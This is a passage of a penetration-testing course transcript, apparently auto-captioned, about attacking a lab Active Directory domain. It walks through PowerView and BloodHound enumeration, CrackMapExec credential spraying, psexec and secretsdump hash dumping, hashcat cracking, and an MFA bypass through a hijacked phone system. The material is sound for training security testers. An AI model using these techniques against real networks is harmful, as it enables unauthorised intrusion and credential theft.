lot of people don't secure their printers because they're just like it's just a printer why do I need to change the password on it but it's a really big one to start thinking outside the box on uh Jenkins instances if you have any developers Jenkins sometimes is wide open you can use that to get a shell on their machine as well and there's just a lot of different things so you're going to look through the web logins you see if you see some sort of login go research that page look up what the default credentials are look up if there's any known vulnerabilities for what's running and just enumerate that Network okay so while we're looking for initial attack vectors we're looking for hashes with responder we're looking to get that loop back from man of the middle six or maybe even strike gold and get an account created on the domain controller right away and if that happens if you if you get domain admin in like two hours and you're sitting there for a 40 hour assessment guess what chances are you're probably gonna have to go back and try it a different way and find as many paths as possible so just keep thinking about how you want to do that but look for responder look for man in the middle six look around the network and sweep around with your your end map and look for any SMB that's open with the SMB signing disabled and start picking out targets for your SMB relay attacks as well so maybe that's something you might attempt in the afternoon you try to capture hashes in the morning and then you start relaying hashes in the afternoon and you can spend just one day doing that and then spend another day focusing on man of the middle six you want to give your client the best comprehensive coverage that you can and try to find all the low hanging fruit if it's their first assessment or try to find those unique ways in if it's not their first assessment so remember it's a timed assessment we only have so much time if it's a really really bad environment then we need to get all the critical findings out of the way if it's a tougher environment it's been pen tested before it might take us all 40 hours to find any way in or we might not even find a way in at all and that's okay as well so the last thing I want to say is to start thinking outside the box so when you have an environment sometimes you're going to run into weird things I've run into environments where there was no SMB I've run into environments where there was no lmnr and you just have to start looking around at what's available to you and one story that I can think about is that I was in this very small medical environment and there was maybe 20 machines and there was no SMB in this network no LM and R I could not get leverage anywhere and then I found by listening in the middle I found some clear texts coming through on a password okay the password was going for IMAP and the IMAP was just running in clear text and I took that password and I started passing that password around and I got into a phone system and in that phone system I had the ability to change some stuff I could change you know where the phones were redirected and forwarded and then I started thinking okay well what can I do with a phone system so I started looking at their Microsoft Outlook and their Outlook had a password reset functionality the password reset functionality went to their office phones guess who controlled the office phones I did so what if I said I want to reset the user somebody I know that's an admin I want to reset their password and with that reset I want to forward that to my phone instead of the office phone is going to so when it rings up I say yeah I'm the user here's my here's my code or token or whatever they send you and go ahead and let's change that password and you bypass the multi-factor authentication there so thinking outside the box is a big one you're going to run into situations where these initial attack vectors might not work for you and just enumerating and seeing what's out there is the most important you might not have a situation where responder works or man in the middle six works or SMB relay works you might have to look at what ports are open on these machines you might have to look around and really focus the websites first that's my big one if you're struggling focused websites and just see what's out there and try to get your leverage in start thinking outside the box and just enumerate enumerate enumerate the more you enumerate and I've been harping on on this the entire course the more you enumerate the better attacker you're going to be don't just focus on the exploit focus on as much information as you can gather and you're going to be super successful so that's my Spiel for this we're going to go ahead and move into post-compromise enumeration we're going to talk about using Powershell a tool called Power view and we're going to talk about Bloodhound as well we'll do a little bit enumeration and then we'll get into some post compromise attacks and that's where a lot of the real fun begins and we can start leveraging some of the stuff we've done in this section and really utilizing that to move upward so so far we've kind of just moved laterally we're going to start moving upward now and really take over that domain admin learn some cool tools and techniques and then we'll be well on our way in the course so I'll catch you over in the next section so we have compromised a user account and the initial attack vectors section we managed to capture Frank Castle's hash right with responder we took that hash offline and we said Hey look it's password one and we were able to also get on to machines with SMB relay without ever having to capture hash we were able to dump the Sam file and collect hashes that way and we also were able to create an account with man in the middle six and pretty much own the whole domain as it was so we have a few different compromises that we can play with and from here we're going to take a pause we're going to go ahead and look at what we can do once we have a compromise and how we can enumerate the network using these compromises so we're going to look at two tools specifically we're going to look a tool called Power view now Power view is a tool that allows us to look at the network and look at enumerate basically the domain controller domain policy domain users groups a lot of different things it goes very very deep with what it's capable of doing and again that's a Powershell tool and we're also going to look at a tool called Bloodhound Bloodhound is going to allow us to look actually visualize in a graph form what is going on in the domain in the network and where can we find the sensitive user that might be logged in or where can we find the shortest path to getting domain admin it's a fantastic tool it should be used on every internal assessment that you do and I think these two tools will really set you apart when it comes interview time being able to talk about them and know how to use them in an assessment so from here we're going to go ahead and move on we're going to start talking about how to install power view use power View and then we'll move into Bloodhound and then eventually we're going to move into these post compromise attacks once we have all this information in front of us so let's go ahead and move into the next video when we install power View so the first tool up that we're going to use is Power view and in order to use power view we're going to have to install it so what I want you to do is go ahead and just go to Google and go ahead and search for Power view GitHub and you can be brought here to powerview at Master this power tools one and it's going to say it's deprecated that's fine you could also go to the power supply directory that they have here a repository and you can download Power view right here so your best bet is either to just download these all of these if you want or you can just click on Power view by itself and download just this file I'm going to just download just this file you can go into raw and copy it or copy the path and either way what I want you to do is I want you to go ahead and take this file and then go bring it over to one of your Windows 10 machines it doesn't matter which one the situation that we are having here is that we're going to run power view which is a Powershell type script and we're going to run it and do enumeration with it we're going to see what it can do for us however we're going to run it directly from the machine now in an attacker situation say we have access to a shell then we'll use that shell and we're going to load Powershell and we'll upload this file for example and then we'll still run power view the nice thing about running it on our machine here is just that it allows us to kind of Auto tab complete which we won't have and it'll just make things a little bit smoother so in a realistic scenario you're not going to be on the machine on like an RDP session you might be chances are you're not going to RDP into most machines but if you can get RDP access and you know it's a machine that a user is not using like a server or something that's just sitting there and you have RDP access to it then feel free to log in and do it this way but for now this is just a best way to demonstrate so go ahead I have it sitting in my downloads folder you can put it wherever you want um and then we'll go ahead and just kind of go from there so meet me in the next video once you've got power view put onto your machine and we'll go ahead and start enumerating the domain using Power view all right so the first thing I want to do is I want to just load up a command prompt and we'll go ahead and do that I'm going to change directory to my downloads folder because that's where I have power View and then the First Command we're going to run is we're going to run Powershell and then we'll do EP that stands for execution policy you can also write it out like like this execution policy but I just like doing EP because it's shorthand and it still works so we're just going to say execution policy bypass and this bypasses the execution policy now something to note about execution policy is it's not for security purposes right uh the reason that execution policy exists is that it's just there to stop us from executing scripts that we don't want to do you know like accidentally executing a script so we're specifically saying hey just go ahead and shut that off so we're going to bypass it here with with Powershell EP bypass and this is pretty common you're going to see this a lot if you utilize Powershell so the next thing we're going to do is we're going to go ahead and call our program so we're going to do that by doing this we're going to say dot and then dot backslash like that and you can just start typing in powerview.ps1 Auto tab hit enter and now that's going to happen nothing's going to show or tell you okay it's just hey you've loaded it so Power view is an incredibly powerful tool um we can do so many things and what we're going to do with it in this course is only going to scratch the surface so my recommendation to you is to go and read up on it I will put a reference down in the description below where you can find a cheat sheet and then the rest is going to be up to you for Googling and finding out what more can do at the end of this course or the 80 portion of the course I'm going to provide some additional references in terms of active directory security and blogs and certifications and courses that you can take and all of those will cover Power view in much deeper level but these are just some of the high level things that you should know when it comes to enumerating a domain and how Power view is powerful so let's go ahead and look at our first command our first command is going to just be get net domain and what is this going to do this is going to get information for us about the domain so go ahead and hit enter on that and you can see that we have a forest and it's marvel.local we have a domain controller here of hydro DC marvel.local and that's all it tells us we have a very simple domain but if we were in a complex domain this would be a little bit more interesting to us just to kind of know you know what's going on where are the domain controllers and if we want to see specifically what domain controllers are there we can say get net domain controllers like this or a controller I should say and hit enter and then it'll tell you hey the domain controller is right here at 192.168 57.140. and the domain controller's name is hydra-dc.marvel.local so it gives you information specifically about the domain controller and some networks have multiple domain controllers and this would provide all that information about those domain controllers but you now know say before you had no idea where the domain controller was in your network you've done some scanning but you really weren't able to identify it you got your exploit in on a machine you logged in you dumped Power view on that machine now you know the domain controller you know where to target next or where your end goal might be so that's just two quick examples more examples we could say hey let's get the domain policy and this will show you all the different policies in the domain for example we can look at the Kerberos policy the system access Etc so let's take a look at like the let's take a look at the system access we can do something like this so in parentheses go ahead and just type in git domain policy like that and you should be able to Auto tab it and then put a dot and just say system access like this and then hit enter and what is this telling us well this tells us a little bit about the policy here so we can see that the minimum password age is one day the maximum password age is 42. um we have lockout counts of zero meaning it's not set password complexity of one so you can look through here and just see like what's the minimum password length seven okay so now I know that the minimum password length is seven I'm gonna go ahead and just spray seven character passwords or you know it should be pretty easy to crack a lot of passwords in a network where it's seven but you should be able to spray passwords across that Network that are pretty weak and probably gain access to some user accounts so this is a very good indicator of what you're up against and um you know it's super nice just to have access to these these different policies and what to look at same thing with Kerberos you could look at the ticketing age and um you know just see how long a Kerberos ticket lasts and you will get more into that when we get into golden tickets but just something to keep in mind um on the Kerberos side as well so from here we could also look at users one command that you can run just for the sake of showing it to you is get net user now this one's going to be a little dirty okay so now we're here and we just dumped this big long list of all the users and it looks dirty like we can pull down all the users here and it's interesting if we want to take our time and kind of read through this you could see okay well here's Frank Castle and it's Frank Castle marvel.local here's his name here's the uh Sam account name right here which is f Castle you kind of read through these and maybe if you look through these you might be able to look at the descriptions and find you know an interesting description here with a password in it which we do have like this one here description password is my password one two three pound so this is another way to compromise an account by you know just viewing the descriptions here uh we did that with the man in the middle six but this is just another way to do it now we could do something like this we could say because like you see how how dirty this output is with just just like seven or eight users imagine a Enterprise Network where there's hundreds of users that would take forever so we could say something like select CN and that will just pull down all the usernames or all the users or we could do Sam account name instead like Sam account name and just pull down the account names here if you wanted to try to get the descriptions we could do description and you can see the my the passwords in my password one two three would be like hmm where did that belong uh so quick dirty way just to kind of sort through these these users and find out a little bit of information about them um and we could look at certain things on here too like when was the last user login how many bad password accounts do they have uh what is their user account control or their rid number which 500 would be the admin right and we just can go through all this information and kind of look through it and pick apart anything that might be of interest to us and we'll talk about some of these features here in just a second and why they might be interesting so let's talk about and shift actually on this to uh user properties so we could say get user property and this is going to show you all the properties that a user might have and we just we discovered all of these These are exactly what's through through and through on these user accounts right but let's say for example go ahead and just tab up let's just say we want to get the properties of the password last set um okay we can look at the different users and when their password was last set and that might be useful we can know okay there's an old stale password out in the network or these password accounts are new like you see the administrator password was the last one changed on 11 30 and then the newer users from the man the middle attack was on twelve nine and you can kind of just look through this same thing like you could look at for example logon count and this is a good way to actually identify Honeypot accounts so you want to be able to see how many times this user has logged in and if you see an account that has never logged in before that might be a Honeypot account you might not want to try to attack that account you might want to avoid that completely because they might just be letting that sit there for you to capture and then once you capture it it's going to alert their system so think about that as well these properties can be incredibly useful you could also look at like the bad password count and just see who's been entering in bad passwords and if there's one there that has like hundreds of them you know you could see that if it's maybe been under attack if you're an administrator for example uh so there's all kinds of useful information I recommend that you just kind of play through this as well and see you know go back and look at some of these in here and just say okay how can I sort through this and what might be interesting to me again reading the the reference guides that I put in the references are going to be super important as well uh so from here let's talk about computers just like getting the users we can also get the computers in the domain so we can just say get net computer like this you can be able to Auto tab I screwed up computer and hit enter and okay it'll it'll list out here all the computers in the domain we only have three which is useful If This Were a bigger domain be much more now that's not a lot of information there so if we want more information we could say full data like this things hit enter and then we get probably too much information um but we can come through here and look at it like here's Spider-Man's machine you could see the last bad password time you could see a log on count um you could see a lot of information here like what's the operating system and you can start to identify operating systems if you want or you could just sort these out like for example if You tab up you could just say select operating system and sort so select is just like grep right you're just pulling down specific information so select operating system and then you can see okay well I've got one server 2019 and two Windows 10 machines in here so that way you can start picking and pulling apart what are the servers in the domain and what are the Windows 10 machines or what are the user machines and kind of start separating them out and getting that information so from here we can also look at groups so for example we could say get net Group which is going to Output quite a bit and these are all built-in groups we haven't made anything new so but we could look through here and see if there's any interesting groups for us because we haven't done anything new it's really not going to be interesting but we can sort through this and say what about getting that group by group name and we just say domain admins okay and then we'll we'll pull down any of the any of the domain admins this way or we can actually sort two by just a wild card instead of specifying all the admins here what if we just say or just domain admins what do we say we want to know specifically what admins are out there so there's administrators hyper-b administrators Enterprise domain key admins so you can look for all the admin group names as well and we can get the members of these groups if we want so we can say get net group member and then we're just going to go ahead and say group name and we can pick one of these groups we could just say domain admins again so this will list out all of our domain admins so we know that SQL service T Stark and administrator are all domain admins in our Network so useful information to have here as well so a couple more things I want to point out there is a tool in here called invoke share finder this is a nice one because you can look and find all the SMB shares in the network you can see what files are being shared and where they're being shared so we know about admin C IPC on every machine but what about this share here that we have and then hackme came up right so it's good to look through these shares and see if there's anything of interest and identify potential interesting shares for us and then two more I want to show you we're really one more in two different ways so let's look at this we're going to type in get net GPO so this is going to show us all the group policies now I added a special one in here just to show you um that we can pull down a bunch of them but so look it's going to look interesting it's going to pull down that heavy data again and sometimes it's overwhelming but we can see like disable Windows Defender that's when we added in there right and then I added in disable SMB signing even though we didn't have to do that I just added that one in to show you a few more in here so let's say we want to select something on here I like to do this I like to select display name and I also like to select when changed and that'll show us okay here's the display name so it gives us an idea of what's going on so we know that there's default domain policies and then we've got to disable Windows Defender disable SMB signing so we know that that's going on in the network and we can learn about their policies that are going on and just collect more information and then we can we can learn when these were changed in the network right so it's important to just dig in and get as much information as possible now this may have been overwhelming this may have been a lot and it may have went really quick my advice probably to go back and watch this one more time play around with this or just look at your notes play around in here and take good notes on what you did and you can go to the references and pull down more information and see how you can utilize that in the future I think this is one of the greatest tools you can use for enumeration so once we're on a machine we want to enumerate the network this is a great way to do so and you can see how quick we can get information about the domain the domain policies users user properties computers groups Group Policy it could do so much more than what I showed you but this is a really good Baseline for you to understand and know about so that is it for Power view from here we're going to go ahead and move on to a tool called Bloodhound which is incredibly fun to use and you're going to see how beneficial it can be so we'll have a high level overview of Bloodhound and then we'll move on into our next section welcome to this video on installing Bloodhound so Bloodhound is a tool that's going to download the data essentially of active directory once we're on a machine or on a network it's going to be able to download the data for us and what it's going to do is visualize that data in a graph so we're going to be able to identify a lot of information about a network very very quickly so it could take us a long time otherwise to you know attempt this and try to try to figure out you know all these complex paths that you might be able to have in a network to get to a domain admin where Bloodhound figures that out really quick for you so this was developed by the team over at Specter Ops and that's Waldo harmjoy and Captain Jesus they're a great team actually one of the references you're going to have blog references is going to be for harm Joy here at the end so I I recommend reading their material because they are the active directory gurus among other people in this field so installing Bloodhound is fairly straightforward here we're going to go ahead and just say aft install bloodhound on our Cali machine and it's going to be a 353 megabytes of additional disk space what does that mean that means this is going to take a while so go ahead and pause the video let this do its install let it do its thing and then meet me back once you're all set up and ready to go and we'll continue on with the instructions that took forever for some reason I don't know what's going on with my internet today I guess it's slow hopefully yours is a lot faster so Bloodhound runs on a tool called neo4j it actually you can see it setting up here neo4j we're gonna have to set that up really quick so let's go ahead and say neo4j console and what we're going to do is we're going to change our default password here just so we're not using default credentials and we're going to be a little bit uh better on security so you can see it boots up at this Local Host let's go ahead and just open this up if we can and we should gain access to this site so okay your username password are going to be neo4j that's going to allow us to connect so neo4j just like the username go ahead and say connect and now it's going to ask you for a new password so go ahead and put whatever password you want in there I'm going to use the very weak password of password okay so you are all set up you're connected you are good to go so now go ahead and close your browser window and now we can go ahead and open up let's open up a new tab and we'll say bloodhound should just start typing it auto tab I'll make this bigger so you can see it and you can see the green check mark here means we are connected to the database so go ahead and just put in neo4j put in your password I'm going to go ahead and save my password log in success and now you should be brought to this that says no data return from the query because we haven't provided it any data yet so we are we've got Bloodhound set up now we're gonna go use what's called an adjuster get some data back from our active directory and then we'll see what we can do with that data so let's go ahead and pull data within jester so now we need to download and set up an ingester there's a few ways that we can do this there is invoke Bloodhound from Powershell there is a tool called sharp pound which is written in C sharp and there's actually even a python one as well we're just going to use the invoke Bloodhound Powershell method and grab some data back from the domain and then we're going to go ahead and analyze it in the next video so what I want you to do is go ahead and search for invoke bloodhound and it should pull up a GitHub here you see data collector we can do sharphound.ps1 or we can do let's open both of these and take a look so data collector will bring you to this it's just going to give you some information about how you can use invoke bloodhound and what the different collection methods are we'll cover what we're going to do with this here once we actually pull the data and we're going to go ahead and just open up this sharphound.ps1 and call the invoke Bloodhound function when we actually run this so go ahead and grab this file take this file and put this on to your Windows 10 machine okay so you should have both Windows 10 machines running and your Windows Server 2016 running because we're going to start pulling data as well so go ahead and log in and then if I could type my password go ahead and log in and then what we're going to do is I'm just going to copy this file over real quick so go ahead and pause your video and meet me over once you've got your file moved over okay so now I've got my file moved over we're going to go ahead and run this so I'm going to run Powershell execution policy bypass just like this and we're going to bring in sharp pound all right so now we're going to run this ingester and it's going to look just like this you can start actually Auto completing a lot of these so we're going to invoke bloodhound and we're going to use a collection method of all like this we're going to specify the domain which is marvel.local and we're going to put a zip file here we're going to take a zip file and we're just going to call it file.zip and this should be it I'll give you a second to catch up and then I'm going to go ahead and hit enter on this and now it's collecting all the data we've got all the data now what we need to do is go copy this data so go to your downloads folder you should be able to copy this data you might have to move it from One desktop to another and then on to the next so I'm going to copy this and take this over to my Windows machine paste it there and then I'm going to take that and paste it onto my machine in Cali so go ahead and get this file moved over to your machine and then I'll meet you over in the next video when we learn how to actually import this file and review the details okay so now we have our Bloodhound opened it's a blank screen we've got our file transferred over and we're ready to do some Bloodhound reviewing so let's go ahead and do upload data over here on the right it's a little up Arrow and then I have my file.zip in my home folder so I'm going to go here and I'm going to go file.zip we're just gonna upload this you can see it's processing all of the Json files that are coming through and in just a second it will have us some nodes available so now let's go ahead and click over here on the little hamburger and you can see that we've got nine users three computers 52 groups three sessions 512 Access Control lists and 592 relationships that's a lot of numbers so what we're looking at and yours might be a little different because it's looking at session so based on who you had logged in at the time and mine have you know I've been just logging in kind of willy-nilly on either Frank Castle or administrator or wherever so the different sessions uh could be different uh versus how you've been logging in but the group should be relatively the same computer should be the same users should be pretty much the same so we can go over to queries and they have some pre-built queries for us so let's find all domain admins and we can look here and it says Hey administrators the domain admin T Stark's a domain admin and if we drag this over just a bit SQL service is a domain admin so right away we know all the domain admins let's find the shortest path to the domain admin and it says domain admins at marvel.local go ahead and select that and it says okay well uh if we look at the Punisher .marvel.local well administrator at marvel.local has a session here well I was logged in as administrator so the sessions here what does that make you think of well okay token impersonation um which we haven't covered yet but token impersonation is going to be a big one uh we can leverage attacks against this to try to compromise the administrator accounts with mimikats which you're going to see as well so you want to Target boxes where there is a domain admin logged in and we can leverage this here we could say okay well I don't want to Target Spider-Man's got nothing going on but the Punisher now if I can get onto that machine I can get that administrator account and then I'm a domain admin that's the shortest path for me right so we can look through here now domain trust there's nothing for us here there's no domain trust for us to do uh we could look through unconstrained delegation and try to find information on that uh and there's just a bunch of pre-built queries here so we haven't talked about kerberosting yet but we will uh shortest path to kerberosting users or kerberosable users so there's the krb TGT account which is a ticket granting ticket account and SQL service that we set up let's just look at SQL service so we can look through that and it's telling us hey you know the SQL service is part of domain admins that's not good right and the Punisher has access Spider-Man has access and we'll talk about what kerberosing is here in just a few videos so high value targets we can look at that as well and this is insane right um but obviously the administrator is a high level Target so if we can if we can capture the administrators here or the actual administrator that lights up all the different paths here where it's red um and you can see Frank Castle is an admin too The Punisher which has a session with administrator who is part of the administrators group who's part of the domain admins group who's part of the Enterprise admins group and you can kind of just look through here and see all the different memberships and all these unique graphs look at this look at the complex or complexity that's going on here right and this is just nine users three computers imagine a network and how complex this is and imagine having to try to figure this out for yourself where we can just click a button and we know all the domain admins or we can just click a button and see where the domain admin has a session this is amazing stuff here so when you're doing an assessment and you've got compromise and you're on a machine you might as well run uh Bloodhound and gather as much data that you can out of that machine out of that Network and see where your Next Movement is and really start to Target your paths especially if you're in a timed assessment or you don't know your next step or your next move this is a great tool really great tool to use and again just like Power view this just scratches the surface there are pre-built queries and custom queries that you can write and Define here and kind of make your own I'm going to leave that up to you as well to do research on those honestly me I use pretty much what's in here as the pre-built and that's enough for me but if you want to go more deep here and go into custom queries you're welcome to do that as well but this is a nice overview of what Bloodhound is capable of and how you can enumerate with it so that's it um hopefully this was informative for you I just wanted to provide a quick overview of a couple tools that we can use the enumeration process never changes right once we have an account on a network we're going to enumerate we're going to enumerate before we get an account we're going to try to find access once we get access we're going to re-enumerate we're going to see what information we can learn once we've gathered that account and then again every time we have access to a new machine we don't know what Stones that's going to uncover as you're going to see in the next section one machine to the next can be a huge difference based on who's logged in and what information that has on it you don't know if that information on there you know has maybe a text file with documents or passwords in it you don't know if there's a administrator logged into that computer and then we can impersonate that administrator there's so many different things that change from machine to machine enumeration is important and the tools and techniques all the way through this course that you've learned already you know nmap digging around just looking around for information is important and then just adding these two tools here to Your Arsenal Gonna Make You significantly better as a pen tester and it'll give you something to talk about in an interview as well you can say look I use power View and I use that to look through for you know users groups I look through policies group policies computer policies you know in you can be able to talk to those and you can say look I use Bloodhound and I I look at that to look at the administrators in the network what administrators are what machine what's my shortest path to the domain admin uh what are my high value targets and you could talk through that as well in an interview and you're going to sound like you know what you're talking about and it's going to make you it's going to set you apart from other people honestly it's going to set you apart so take these two tools that I'm showing you and play around with them get better and you're going to see a big difference so from here we're going to talk about post exploitation attacks so once we've compromised One account what can we do with that account and how can we leverage that into other compromises and eventually own this whole network here so I'm excited to move forward and cover these next sections so I'll see you over in the next section when we start talking about these attacks welcome to this section on attacking active directory post compromise attacks so all the attacks that I'm about to introduce you to in this section involve having some sort of credential first so we have to have a username password or a shell on a machine or something along those lines in order for these attacks to be effective so we're going to be covering attacks like past the hash past the password we'll talk about token impersonation and kerberosting gpp slash C password attacks and golden ticket attacks and you don't have to have any idea what I'm talking about right now I'm just kind of giving you a quick overview so just keep in mind that these attacks require compromise already and they're some of the best attacks that we can leverage in a network once we do have compromise so I'm really excited to go over this and really excited to take you down this learning path of these attacks so let's go ahead and jump into the first one we start covering past the hash and pass the password so the first thing that I like to do when I compromise a user account or a machine is I like to do what is called pass the password or possibly pass the hash so when we talk about what this is this is just passing this around the network so remember we capture the password of password one and we cracked it when we captured it with responder now we have a username and a credential and we logged into a machine we dumped some hashes and we have credentials there as well right so utilizing those we can either take those credentials Offline that we dumped or we can take those hatches and try to pass them around or pass the password around so taking a look at what this means on a technical level there is a tool that we're going to use called crack map exec now crackpack the SEC just takes the username domain and password as you see here and what it does is it throws that password all around the subnet here so we'll take it against the subnet throw it around and we'll see where it sticks now if you recall we have our user Frank Castle who's not only an admin on The Punisher machine but also an admin on Spider-Man machine as well so playing off the different example of past the hash let's say that we have a PS exec here which is what I've set up we have PS exec with interpreter we get on to this machine and we run a hash dump well we can take the hash dump of that local user here and you can see we just captured the last bit of this hash and we'll just try to pass that around so what that looks like is something like this where you do the same thing against the network here with the user F Castle which is a local user and then the capital H for a hash and then dash dash local signifying that we're going to go ahead and pass this around locally and you can see that we didn't have any luck on this one and that's okay but that's still what we're after is we're after trying to pass this local hash around to see if we can get on any machines this one is a big one these two are big ones now you do not have to crack this password to be able to pass this hash around that's huge the other thing is if you do have a password you could pass that around and see where you can get on any machine as well these local accounts are very dangerous the issue is a lot of Administrators will reuse the same account and password to set up machines so if you're able to dump an administrator password or a hash then guess what you can pass that hash along the network and I have seen it where the entire network uses the same local administrator password or hash and you own the whole network without really having to compromise anything so looking into these local hashes these local accounts are super important as well so from here we're going to install our tool we're going to take a look at a couple different features and what we can do here and then we're going to play around crack map exec and see what it's capable of as well so let's go ahead and just dive into the next video and we're going to go ahead and install crack exec all right installing crack map exec is super super easy so from a terminal all we have to do is say aft install crack map exec just like this and it should load up for us might take a second to download the files and tonight it's running a little slow on the internet for me so give this just a second here and it will install and then we should be ready to go so go ahead and get this installed this is all you need to do for now very short video possibly the shortest one in the class and then check it real quick crack map exec it's there it works we're good to go so I'll catch you over now in the next video all right now let's set up the situation here we've got our Windows Server running and we've got every machine running so I've got my two Windows 10 machine my Windows Server running and we're going to use this tool that we just installed crack map exec and it's going to look something like this you can say crack map exec we could do dash dash help and take a look at what it's got to offer us and I can make this a little bit bigger we can scroll up to the top and really what it does is we need to provide it with a Target typically we either provide Target IP addresses a range or cider notation we can do a bunch of different things my favorite is just give it a cider notation and you're going to see what that looks like then we're going to have to provide a username a domain and a password or we can provide a username and password and do a dash dash local if it's a local account but from here we're going to provide a username domain password because as of right now we have just captured the user account of fcastle password one and there's so many different things that we can do here there's actually a lot of modules that we can run now the modules are kind of finicky but I'm going to show you some cool little tricks that we can attempt to do here so first of all let's just check our status how about we do that so we're going to just do something like this we're going to say crack map exec okay in in a small pause and course update crack map exec actually changed the way the syntax is run so we need to make a minor change what I'm about to show you is how to do this and I just want you to follow along with this change so what you're going to do instead of writing the IP address as shown in the next part of this video all you need to do is put SMB in front of it so whatever your IP address is like 192 168 0.0 24 whatever that might be right here ensure that you have SMB in front of it and then go ahead and follow along with SMB in front with the rest of the command line and you should be good to go the rest of the time and we're going to say a user actually let's go ahead and specify the domain or where we're going to be attacking so 192 168 57.0 24 for me so it's going to sweep the entire network with this we're going to say user of f Castle domain of Marvel dot local and password of password one so go ahead and fire that off and there we go so it has gone ahead and it attempted to attack my DOT one machine which is my local machine here but it also attacked the network that we have right so we've got the hydro DC we've got Spider-Man and then the Punisher here and you could see that it came through it tried this username and password on hydro DC it did not work what does that tell us that means that this user does not have SMB access because this is trying to access SMB here it doesn't have SMB access to the domain controller unfortunately we don't win that easy all the time uh We've also tried Spider-Man right we knew about the Punisher but we didn't know about Spider-Man so that's nice um so we've got Spider-Man now and The Punisher so we've owned a second machine when it says pone here that means we now have access to a second machine so what can we do we could go PS exec dot pi and we can use these credentials and do it to dot 142 as we did with DOT 141 we can also do something which this is kind of cool we could do something like Dash ass Sam and if we get Ownage sometimes this will work for us it's going to try to dump the Sam file and here it didn't work that's okay so it tries to go in and this is successful a lot of the time where it goes in and it'll try to dump the the Sam file out of these machines and if we look up here there's a few different things that we can do with it we could try to dump the Sam or LSA ntds which we talked about way in the beginning and we're going to talk about it again here in a little bit uh we could enumerate shares there's all kinds of things that we can add on again there's all these modules which we're not going to even cover I do recommend reading the documentation on this because it can go really deep and it's surprising how deep this can actually go but from here let's just talk about what we can do so we weren't able to dump the Sam here but we can utilize a tool called secret stump which we're going to cover in the next video on how to get the Sam file and we can just do that PS exec right so we had PS exec.com Ai and we could say Marvel and we could say F Castle Ward one and we could put that at 192.168.57.142 and try to get a shell there and wouldn't you know it who am I hostname where Authority system on Spider-Man so this is a quick win here we can take advantage of this as we're going to see in the next video dumping some hashes out getting some more information extracting this we could also go try to get a shell on this machine uh via the meterpreter PS exec as well and utilize those so that's just a quick overview of how useful passing the password is this is if I get a credential the very first thing I'm doing is I'm passing it around the network because I know it's valid you can also utilize this the password spray but I would recommend against doing that on domain accounts because what happens is say we have 50 machines here you take this username you could put any password you want here and try to spray it across the network and what's going to happen is you're going to get failed login attempts and if you get so many in a row you might lock out your user account however if you have a local account which you're going to see here in a couple videos you can actually try password spraying against it and you could just throw anything you want at it to see if it sticks and you might get lucky and the local accounts will have that same lockout policy like domain accounts do so I always like to do some password spraying on local accounts as another strategy if you're kind of stuck in not getting anywhere or if you've come across some different passwords or different password phrases or patterns that you might have noticed in the network it's another good thought to have to just try it against some different accounts or even just admin or administrator so that's it for this lesson we're going to go ahead and move on to the next lesson which is how to dump hashes now that we have this here so we've got a user account let's dump hashes with this user account especially on the two machines that we found and we'll store those hashes we'll even try to crack those hashes and we'll move on to passing the hash as well just as an example so I will catch you over in the next video so now we've used a password to pass around the network we discovered that 142 and 141 have the same local admin of Frank Castle so we are able to get a shell on both machines now we could try PS exec with metasploite go in there run hash dump see if we can get lucky but again that's a little bit on the noisy side that does you saw it get picked up by uh anti-virus by Windows Defender but you're seeing that PS exec still isn't I still haven't turned off my antivirus quite yet so you can see that PS exec on PS exec.pi is not getting picked up so that's nice what we can do to dump hashes in this situation is we can run a tool called secret stump and guess what secretzump.pi also part of the impact it toolkit so we can do something along these lines we can say Marvel F Castle and then password one this should look very familiar it's the same syntax as before and then just 192 168 57 and we'll start with Frank Castle's machine at 141. try that see what happens oh look at that that's beautiful okay we know we have access to 142 as well so let's go ahead and just do that and it's going to come in here and it's going to dump all this information for us so this is wonderful information okay it's coming in here and it's dumping not only the Sam hatches but it's dumping what are known as LSA secrets in this DP API key um you don't have to worry too much about these right here more so we're going to focus on the hashes that we get back if we get any local hashes we'll talk more about what the LSA secrets are and the rest of this is when we get into mimikats here in just a few videos so I'll save that for this or I'll save that for later but just know that you can dump these hashes and look we can grab these we can also just kind of examine and see like I can copy this and we can just go into a new tab and just say G edit I'll just call this test and we'll just paste this into here and then I'll grab these other ones and I'll paste them and you could do a quick the quick eye test and see here if I can copy if the same hash shows up more than once so look here and just see and we can separate these out just to make it a little easier if there's password reuse the last hash here will be the same so you can see here that the administrator account is utilizing the same password so if we're going to try to pass this hash around guess what we are we can try to pass this around and see if it'll get us around the network and we'll see what this does and then we'll try to crack some of these hashes and see if these hashes crack what it's going to look like and go from there so in the next video we're going to focus on trying to crack these hashes and then I'll show you the passing the hash method which is incredibly useful and why we don't even have to attempt to crack these if we don't want to so let's go ahead and jump over the next video or we just quickly try to crack these passwords and then we'll move on into passing the hash picking up right where we left off so I'm going to clean this up just a little bit we know the administrator here they're the same hash we can identify that here so I'm going to actually just delete all of these accounts and we're not going to worry about this w d a utility here wdag we're not going to worry about default account or guest account I'm gonna go ahead and delete all those I'm just interested in the user accounts and the administrator accounts so let's copy this and I'm going to move this to my hashcap folder and I'm going to just put it in a new text document I'm actually going to reuse the one that we used before which was that that hashes4.text so we'll use that and then we're going to go ahead and try to crack it so bringing this over you can see that these hashes here these hashes are what are called ntlm previously we've cracked ntlm V2 hashes now ntlm are the local hashes when you dump a Sam that's what type of hash it is now these are stored under module 1000 again you could do hashcat dash dash help and then grep ntlm and find that but we're going to try to crack these if we can't crack these then we'll try to pass them around special note one thing to remember you can pass around ntlm hashes you cannot pass around ntlmv2 hashes big difference ntlm hashes can be passed and tail and B2 cannot so remember that from the next video but from here what I'm going to do is I'm just going to do same thing as before hashcat64.exe and I'm going to give this a module of a thousand because that's ntlm and then I'm going to just provide this hashes if I could spell it hashes4.text and then rock you dot text we'll just use a simple word list Dash capital O for optimization here and it's going to try to crack these passwords it should go through it pretty quick and I think at least one of them will fall oh we made the we made the admin password password too I actually had forgotten and then the Peter Parker or one of them three one oh three One D came back as as a admin that is blank so it's possible that our admin actually is disabled when we see a blank account like this that means that the password is likely disabled so we might not be able to actually pass this around because that account has been disabled we could try to pass around password 1 and password two but we've now cracked both of these two and these are weak accounts so now we also have a good idea of what kind of passwords they're using in their environment and we could just take note of this and this is something that we can write in a report as a finding and just build off of this it's always about passwords right it really comes down to passwords and weak passwords are going to get your network taken down so quick because there's so many different ways that we can capture hashes in a network that it's just a matter of time before we do and then start trying to crack them or pass them around so let's go ahead and meet up in the next video when we try to pass around a hash and then we'll talk mitigations after that so we've got these three hashes here and all we need to copy is this second half right here so we're just going to copy the 